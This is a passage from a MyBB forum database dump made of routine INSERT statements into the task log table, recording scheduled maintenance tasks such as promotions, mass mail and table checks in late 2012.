promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15772', '9', '1352531449', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15773', '5', '1352533545', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15774', '9', '1352533770', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15775', '3', '1352533978', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15776', '9', '1352534106', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15777', '3', '1352534380', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15778', '1', '1352534414', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15779', '7', '1352534418', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15780', '5', '1352535015', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15781', '9', '1352535068', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15782', '5', '1352536018', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15783', '9', '1352536033', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15784', '3', '1352536200', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15785', '9', '1352536997', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15786', '5', '1352537184', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15787', '9', '1352537764', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15788', '3', '1352537959', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15789', '1', '1352538035', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15790', '7', '1352538046', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15791', '5', '1352538302', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15792', '9', '1352539552', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15793', '5', '1352539925', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15794', '3', '1352541555', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15795', '9', '1352541589', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15796', '5', '1352541657', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15797', '1', '1352541963', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15798', '7', '1352542052', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15799', '5', '1352542063', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15800', '9', '1352542225', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15801', '5', '1352544717', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15802', '9', '1352544734', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15803', '3', '1352544756', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15804', '9', '1352544944', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15805', '3', '1352546900', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15806', '1', '1352546985', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15807', '7', '1352546991', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15808', '5', '1352546995', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15809', '9', '1352547007', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15810', '3', '1352547069', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15811', '9', '1352547880', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15812', '5', '1352547949', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15813', '9', '1352549578', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15814', '3', '1352550162', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15815', '1', '1352550177', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15816', '7', '1352550218', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15817', '5', '1352550223', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15818', '5', '1352550327', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15819', '9', '1352550337', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15820', '3', '1352550609', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15821', '9', '1352551306', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15822', '5', '1352551504', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15823', '9', '1352552960', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15824', '3', '1352553011', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15825', '1', '1352553478', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15826', '7', '1352553513', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15827', '5', '1352553519', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15828', '9', '1352553534', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15829', '5', '1352554196', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15830', '9', '1352554316', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15831', '3', '1352554361', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15832', '9', '1352554953', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15833', '5', '1352555109', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15834', '9', '1352557391', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15835', '3', '1352557475', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15836', '1', '1352557630', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15837', '7', '1352557947', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15838', '5', '1352558051', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15839', '9', '1352558215', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15840', '3', '1352558223', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15841', '9', '1352558611', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15842', '5', '1352559722', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15843', '9', '1352559845', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15844', '3', '1352560573', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15845', '1', '1352560583', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15846', '7', '1352560649', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15847', '5', '1352560655', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15848', '9', '1352560657', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15849', '5', '1352561646', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15850', '9', '1352561672', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15851', '3', '1352561677', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15852', '9', '1352562029', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15853', '5', '1352564139', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15854', '9', '1352566341', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15855', '3', '1352566343', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15856', '1', '1352566354', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15857', '7', '1352566358', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15858', '5', '1352566380', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15859', '9', '1352568138', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15860', '3', '1352568227', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15861', '1', '1352568232', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15862', '7', '1352568397', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15863', '5', '1352568467', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15864', '9', '1352570780', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15865', '3', '1352571016', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15866', '5', '1352571381', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15867', '1', '1352571397', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15868', '7', '1352571484', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15869', '9', '1352571499', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15870', '5', '1352571906', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15871', '9', '1352571923', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15872', '3', '1352572920', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15873', '9', '1352573510', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15874', '5', '1352573516', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15875', '9', '1352575341', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15876', '3', '1352575346', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15877', '1', '1352575363', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15878', '7', '1352575376', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15879', '5', '1352575401', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15880', '5', '1352575821', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15881', '9', '1352576042', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15882', '3', '1352576060', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15883', '9', '1352576411', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15884', '5', '1352577037', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15885', '9', '1352577391', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15886', '3', '1352577604', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15887', '1', '1352577686', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15888', '7', '1352577693', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15889', '5', '1352577904', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15890', '9', '1352578459', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15891', '5', '1352579173', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15892', '9', '1352579177', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15893', '3', '1352579676', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15894', '9', '1352580065', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15895', '5', '1352580327', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15896', '9', '1352580931', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15897', '3', '1352583371', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15898', '1', '1352583379', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15899', '7', '1352583406', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15900', '5', '1352583409', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15901', '9', '1352583415', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15902', '9', '1352583654', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15903', '5', '1352584740', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15904', '9', '1352585038', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15905', '3', '1352585050', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15906', '1', '1352585493', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15907', '7', '1352585510', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15908', '5', '1352586580', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15909', '9', '1352586586', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15910', '3', '1352586882', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15911', '9', '1352587434', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15912', '5', '1352587546', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15913', '9', '1352588274', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15914', '3', '1352588364', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15915', '1', '1352588486', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15916', '7', '1352588962', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15917', '5', '1352588971', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15918', '9', '1352589183', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15919', '5', '1352590291', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15920', '9', '1352590685', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15921', '3', '1352591045', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15922', '9', '1352591093', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15923', '5', '1352591112', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15924', '9', '1352592319', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15925', '3', '1352592328', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15926', '1', '1352592335', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15927', '2', '1352592340', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15928', '7', '1352592568', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15929', '11', '1352592702', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15930', '5', '1352592765', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15931', '9', '1352592787', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15932', '5', '1352593521', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15933', '9', '1352593561', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15934', '3', '1352593813', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15935', '9', '1352594477', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15936', '5', '1352594977', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15937', '9', '1352595752', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15938', '3', '1352595761', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15939', '1', '1352595767', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15940', '7', '1352595817', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15941', '5', '1352595918', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15942', '9', '1352596545', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15943', '5', '1352597356', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15944', '9', '1352597360', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15945', '3', '1352597464', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15946', '9', '1352598096', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15947', '5', '1352598390', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15948', '9', '1352599201', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15949', '3', '1352599214', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15950', '1', '1352599219', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15951', '7', '1352599225', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15952', '5', '1352600613', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15953', '9', '1352600640', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15954', '5', '1352600857', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15955', '9', '1352601476', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15956', '3', '1352602045', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15957', '9', '1352602602', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15958', '5', '1352602662', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15959', '3', '1352602913', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15960', '1', '1352602950', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15961', '7', '1352602960', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15962', '5', '1352603411', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15963', '9', '1352603419', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15964', '5', '1352604411', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15965', '9', '1352604420', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15966', '3', '1352605535', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15967', '9', '1352605814', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15968', '5', '1352605844', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15969', '9', '1352606243', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15970', '3', '1352607185', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15971', '1', '1352607187', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15972', '7', '1352607254', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15973', '5', '1352607270', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15974', '9', '1352607285', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15975', '5', '1352608161', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15976', '9', '1352608278', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15977', '3', '1352608416', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15978', '9', '1352609035', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15979', '5', '1352609212', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15980', '9', '1352609967', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15981', '3', '1352610287', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15982', '1', '1352610665', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15983', '7', '1352610695', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15984', '5', '1352610723', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15985', '9', '1352610853', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15986', '5', '1352611840', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15987', '9', '1352612894', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15988', '3', '1352613286', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15989', '5', '1352613348', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15990', '9', '1352614457', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15991', '3', '1352615067', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15992', '1', '1352615300', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15993', '7', '1352616187', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15994', '5', '1352617027', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15995', '9', '1352617327', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15996', '3', '1352617351', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15997', '1', '1352617529', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15998', '7', '1352617536', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15999', '5', '1352617559', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16000', '9', '1352618055', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16001', '5', '1352618862', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16002', '9', '1352618921', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16003', '3', '1352619012', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16004', '9', '1352619625', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16005', '5', '1352620722', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16006', '9', '1352620741', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16007', '3', '1352620792', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16008', '1', '1352622726', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16009', '7', '1352622757', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16010', '5', '1352622773', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16011', '9', '1352623525', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16012', '3', '1352624574', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16013', '5', '1352624639', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16014', '9', '1352624659', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16015', '1', '1352624682', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16016', '7', '1352624744', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16017', '5', '1352624755', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16018', '9', '1352625066', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16019', '5', '1352626458', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16020', '9', '1352626491', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16021', '3', '1352626527', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16022', '9', '1352633552', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16023', '5', '1352633559', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16024', '3', '1352633572', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16025', '1', '1352633588', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16026', '7', '1352633606', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16027', '9', '1352634220', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16028', '5', '1352634326', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16029', '9', '1352635203', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16030', '3', '1352639828', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16031', '1', '1352639853', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16032', '5', '1352639869', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16033', '7', '1352639869', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16034', '9', '1352641996', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16035', '5', '1352642022', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16036', '3', '1352642066', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16037', '9', '1352642153', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16038', '3', '1352642348', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16039', '1', '1352642857', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16040', '7', '1352642881', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16041', '5', '1352642890', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16042', '9', '1352645308', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16043', '5', '1352645335', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16044', '3', '1352645453', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16045', '9', '1352646423', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16046', '3', '1352646431', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16047', '1', '1352646595', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16048', '7', '1352646597', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('16049', '5', '1352646705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16050', '9', '1352646722', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16051', '5', '1352647853', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16052', '9', '1352647874', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16053', '3', '1352647881', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16054', '9', '1352648518', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('16055', '5', '1352648782', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog 